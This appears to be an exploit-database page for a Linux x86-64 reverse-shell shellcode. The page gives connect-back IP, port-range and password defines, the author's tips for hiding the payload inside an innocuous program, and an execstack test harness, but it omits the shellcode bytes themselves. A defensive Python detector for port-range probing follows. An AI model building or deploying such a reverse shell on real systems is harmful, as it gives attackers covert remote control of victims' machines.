Linux x86-64 Continuously-Probing Reverse Shell via Socket + Port-range + Password - 172 Bytes

Author: CripSlick Published: 2016-07-12 Verified: Verified



#include <stdio.h>
#include <string.h>
// Exploit Title: [Continuously-Probing Reverse Shell via Socket + port-range + password (172 bytes)]
// Date: [07/10/2016]
// Exploit Author: [CripSlick]
// Tested on: [Kali 2.0]
// Version: [No program being used or exploited; I only relied on syscalls]
// =====================  Why use Da LaCrips Reverse Shell??  =============================
// 1. The victim can launch the payload and THEN you can connect (unlike
//    every other reverse shell where you must be ready for the connection ahead of time)
// 2. You get multiple ports (that means multiple terminals can run on a single victim)
// 3. If your connection/port gets disconnected, you can accept that port connection right back again
// 4. You will be able to access any Linux system distro via syscalls
// 5. You get a password and easy-to-change variables
// 6. You can easily link it to an innocuous program since the terminal closes via fork after launch
//    ENJOY!!
//OffSec ID: OS-20614
#define IPv4        "\x0a\x01\x01\x04"  // in forward-byte-order
#define High_Port   "\x8f\x01" //399    // in reverse-byte-order (network order)
#define Low_Port    "\x86\x01" //390    // in reverse-byte-order (network order)
// python + import socket + hex(socket.htons(<Port_Number>))
#define Password    "\x6c\x61\x20\x63\x72\x69\x70\x73"  // in forward-byte-order
// Default Password = 'la crips' without quotes
// python + '<password>'[::1].encode('hex')
// you can use complex ASCII characters
// example: \x21\x40\x20\x3C\x52\x7C\x70\x24 = !@ <R|p$
// Port-Note 1/2:   your Low_Port will NOT be hit,
//                  only the 2nd lowest to the highest will return to you
//                  example of using only one port:
//                  High_Port = 399 & Low_Port = 389 = only port 399
// Port-Note 2/2:   If you have over a hundred ports to probe, there may be some delay
unsigned char code[] =
    /* the 172 shellcode bytes are not reproduced on this page */

// Test harness: the array lives in a data section, so the binary must be built
// with that section executable (e.g. gcc -fno-stack-protector -z execstack) for "call code" to work.
int main ()
{
    // I make sure there are no nulls
    // The string count will terminate at the first \x00
    printf("The Shellcode is %zu Bytes Long\n", strlen(code));
    // Next I throw 0xAAAAAAAA into every register before shellcode execution
    // This ensures that the shellcode will run in any circumstance
    __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
        "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
        "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
        "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
        "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
        "call code");
    return 0;
}
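The behaviour the Port-Notes describe (the infected host repeatedly trying every port from Low_Port+1 up to High_Port on one fixed address until something accepts) is what a defender can look for in flow or firewall logs. The Python below is an added example, not part of the original exploit: it runs a repeated consecutive-port-sweep heuristic over a constructed log in a made-up "ts src dst dport outcome" format, flagging source/destination pairs that keep hitting a contiguous block of ports.

```python
import re
from collections import defaultdict

# Constructed sample flow log ("ts src dst dport outcome"), not from the page: 10.1.1.20
# repeatedly sweeps ports 391-393 on 10.1.1.4, the trail a payload probing Low_Port+1..High_Port leaves.
SAMPLE_LOG = """\
1000 10.1.1.20 10.1.1.4 391 REFUSED
1000 10.1.1.20 10.1.1.4 392 REFUSED
1000 10.1.1.20 10.1.1.4 393 REFUSED
1001 10.1.1.20 10.1.1.4 391 REFUSED
1001 10.1.1.20 10.1.1.4 392 REFUSED
1001 10.1.1.20 10.1.1.4 393 ACCEPTED
1005 10.1.1.21 10.1.1.9 443 ACCEPTED
1006 10.1.1.21 10.1.1.9 80 ACCEPTED
"""
LINE_RE = re.compile(r"^(\d+) (\S+) (\S+) (\d+) (\S+)$")

def parse_log(text):
    """Yield (ts, src, dst, dport, outcome) tuples, skipping malformed lines."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            ts, src, dst, dport, outcome = m.groups()
            yield int(ts), src, dst, int(dport), outcome

def longest_consecutive_run(ports):
    """Return (length, low, high) of the longest run of consecutive port numbers."""
    s, best = set(ports), (0, None, None)
    for p in s:
        if p - 1 in s:
            continue  # only start counting at the bottom of a run
        q = p
        while q + 1 in s:
            q += 1
        if q - p + 1 > best[0]:
            best = (q - p + 1, p, q)
    return best

def find_range_probers(events, min_ports=3, min_rounds=2):
    """Flag (src, dst) pairs that hit >= min_ports consecutive ports, each >= min_rounds times."""
    hits = defaultdict(lambda: defaultdict(int))  # (src, dst) -> dport -> attempt count
    for _ts, src, dst, dport, _outcome in events:
        hits[(src, dst)][dport] += 1
    alerts = []
    for (src, dst), per_port in hits.items():
        n, low, high = longest_consecutive_run(per_port)
        if n >= min_ports and min(per_port[p] for p in range(low, high + 1)) >= min_rounds:
            alerts.append((src, dst, low, high, sum(per_port.values())))
    return alerts
```

The thresholds are deliberately low for the tiny sample; on real telemetry raise min_ports and min_rounds and bound the match to a time window to keep ordinary client traffic from matching.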